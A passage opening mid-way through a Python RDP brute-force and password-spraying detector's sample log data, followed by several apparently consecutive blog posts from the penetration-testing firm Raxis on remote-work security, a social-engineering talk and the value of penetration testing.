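    "2020-04-02T09:00:20Z EventID=4625 SourceIP=192.0.2.5 User=jsmith LogonType=10",
    "2020-04-02T09:00:45Z EventID=4624 SourceIP=192.0.2.5 User=jsmith LogonType=10",
    "2020-04-02T09:05:00Z EventID=4625 SourceIP=203.0.113.7 User=administrator LogonType=10",
    "2020-04-02T09:05:10Z EventID=4625 SourceIP=203.0.113.7 User=administrator LogonType=10",
    "2020-04-02T09:05:20Z EventID=4625 SourceIP=203.0.113.7 User=administrator LogonType=10",
    "2020-04-02T09:05:30Z EventID=4625 SourceIP=203.0.113.7 User=administrator LogonType=10",
    "2020-04-02T09:05:40Z EventID=4625 SourceIP=203.0.113.7 User=administrator LogonType=10",
    "2020-04-02T09:05:50Z EventID=4625 SourceIP=203.0.113.7 User=administrator LogonType=10",
    "2020-04-02T09:10:00Z EventID=4625 SourceIP=198.51.100.9 User=alice LogonType=10",
    "2020-04-02T09:20:00Z EventID=4625 SourceIP=198.51.100.9 User=bob LogonType=10",
    "2020-04-02T09:30:00Z EventID=4625 SourceIP=198.51.100.9 User=carol LogonType=10",
    "2020-04-02T09:31:00Z EventID=4625 SourceIP=10.0.0.4 User=svc_backup LogonType=2",
    "not a log line",
]

if __name__ == "__main__":
    for ip, reason in detect_rdp_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {reason}")
```

The two rules catch different behaviour: the sliding window catches the noisy attacker hammering one account, while the distinct-account count catches the quiet one spreading a few guesses across many users to stay under lockout thresholds. The user who mistyped twice and then logged in trips neither.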
Where to start
So, what’s the solution? Our previous posts in this series have talked about ways to make networks more resilient from a technological perspective. But this is also a time when IT pros have a responsibility to safeguard their companies’ infrastructure and protect their employees. It’s up to you to make sure that productivity doesn’t come at the expense of security, even if that isn’t what your C-suite leaders or colleagues want to hear right now.
The good news is that you don’t have to go it alone. Raxis experts can help you discover and document any unintended security consequences that come from your team working remotely. We can provide a fresh, hacker’s-eye evaluation of your perimeter defenses along with continual assessments to make sure they remain effective. We also offer many remote solutions that go hand in hand with the new workplace guidelines for many of our customers.
Just as the coronavirus has made us more careful about our physical health, the resulting work-from-home experience should make us much more conscious of our cybersecurity posture. Give us a call and let’s talk about how Raxis can help you emerge from this crisis more secure and more confident about working remotely.
Brad Herring and Scott Sailors had the pleasure of presenting at the (ISC)² Atlanta Chapter Meeting last Thursday. The topic was social engineering and how its high success rate impacts network security. Herring and Sailors shared the most common attack vectors, which include phishing, spear phishing, vishing, physical with a pre-text bias and physical with a technology bias.
The members were shocked at the 90% success rate Raxis sees with social engineering across all verticals and business sizes. Further sobering is the fact that, once Raxis gains access to an internal network, our team is successful in achieving an “impactful breach” 85% of the time.
Once it sank in that determined and skilled hackers are commonly able to breach armed security, card-key systems, numeric keypads and other physical controls, the importance of achieving and maintaining a strong internal network security program became apparent.
This engaging meeting facilitated many conversations about physical security as well as the effectiveness of a mature phishing campaign. The group was able to heighten their awareness of the types of attacks to which businesses often fall prey, understand the behind-the-scenes actions that take place once credentials or access are obtained, and discuss meaningful remediation steps for combating these attacks.
Penetration testing is so important for businesses today. Almost every day we see companies in the news as the result of a big hack. The aftermath is ugly – lawsuits, loss of trust, downtime and, in many cases, the hacked entity finds itself out of business.
In a recent interview with an IT management firm, I was told that many of their customers (mostly SMB) didn’t want a penetration test because they knew they would fail. I see this same reaction in larger companies as well.
This fear of failure is the wrong way to look at penetration testing. At Raxis, we say it all the time, “You can’t fix what you don’t know is broken.” Penetration testing should not be looked at as something that points out your failure; rather it should be embraced as something that helps you get better.
Vulnerabilities are common
We see many of the same vulnerabilities across the nation. Many of them are simple to remediate. Most of them have escaped the attention of the IT team for any number of reasons, but most of all because the IT team is simply busy. Most teams are overworked and understaffed. The workload is high. As a security professional you have to get it right 100% of the time – however, the hacker only has to get it right once.
The fear of failing is misplaced. Almost every penetration test will show vulnerabilities or, at the very least, likely attack vectors that could be exploited given more time. Finding vulnerabilities should not be seen as a failure but rather as a responsible approach to better security.
Penetration testing should be about partnership
A penetration test is a valuable tool to help a security team more efficiently locate vulnerabilities, and, if you’ve partnered with a good company, it will offer remediation recommendations that help you fix those vulnerabilities efficiently. A good penetration testing company offers insight and help, not judgment.
I like to call our penetration tests an assessment. That’s truly a better word. We don’t test our customers as much as we partner with them. Raxis is the watchful eye that helps your company stay out of the news. We help you safeguard your data, and we help you maintain trust with your customers.
Penetration testing should be a holistic approach
When a hacker looks at your company, they are taking a holistic approach, and they are going to go for the easiest method with the least amount of risk that they can find. Common attack vectors include:
Social Engineering
WiFi Systems
Internal and External Networks
Mobile Applications
Web Applications
APIs
Each of these areas allows escalation to the others. While often viewed as independent systems, the reality is that a weakness in one often leads to a breach in another.
Security is hard. This is why it’s so important to partner with a reputable penetration testing company that you can trust. I urge you not to look at penetration testing as the enemy but rather as the relief you and your team so desperately need.
Learn more about how our penetration tests work.